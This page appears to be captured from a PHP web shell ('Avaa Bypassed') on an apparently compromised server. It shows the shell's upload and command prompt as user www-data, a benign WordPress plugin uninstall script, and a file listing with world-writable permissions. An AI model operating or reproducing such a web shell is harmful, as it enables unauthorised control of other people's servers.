[ Avaa Bypassed ]




Upload:

Command:

www-data@3.141.193.189: ~ $
<?php
/**
 * Clean-up on uninstalling.
 * @package advanced-editor-tools
 */

if (
	! defined( 'WP_UNINSTALL_PLUGIN' ) ||
	! WP_UNINSTALL_PLUGIN ||
	dirname( WP_UNINSTALL_PLUGIN ) !== dirname( plugin_basename( __FILE__ ) )
) {

	exit;
}

delete_option( 'tadv_settings' );
delete_option( 'tadv_admin_settings' );
delete_option( 'tadv_version' );

// Delete old options
delete_option('tadv_options');
delete_option('tadv_toolbars');
delete_option('tadv_plugins');
delete_option('tadv_btns1');
delete_option('tadv_btns2');
delete_option('tadv_btns3');
delete_option('tadv_btns4');
delete_option('tadv_allbtns');

Filemanager

Name Type Size Permission Actions
block-editor Folder 0777
mce Folder 0777
plugin-assets Folder 0777
readme.txt File 16.92 KB 0777
tadv_admin.php File 31.51 KB 0777
tinymce-advanced.php File 35.56 KB 0777
uninstall.php File 609 B 0777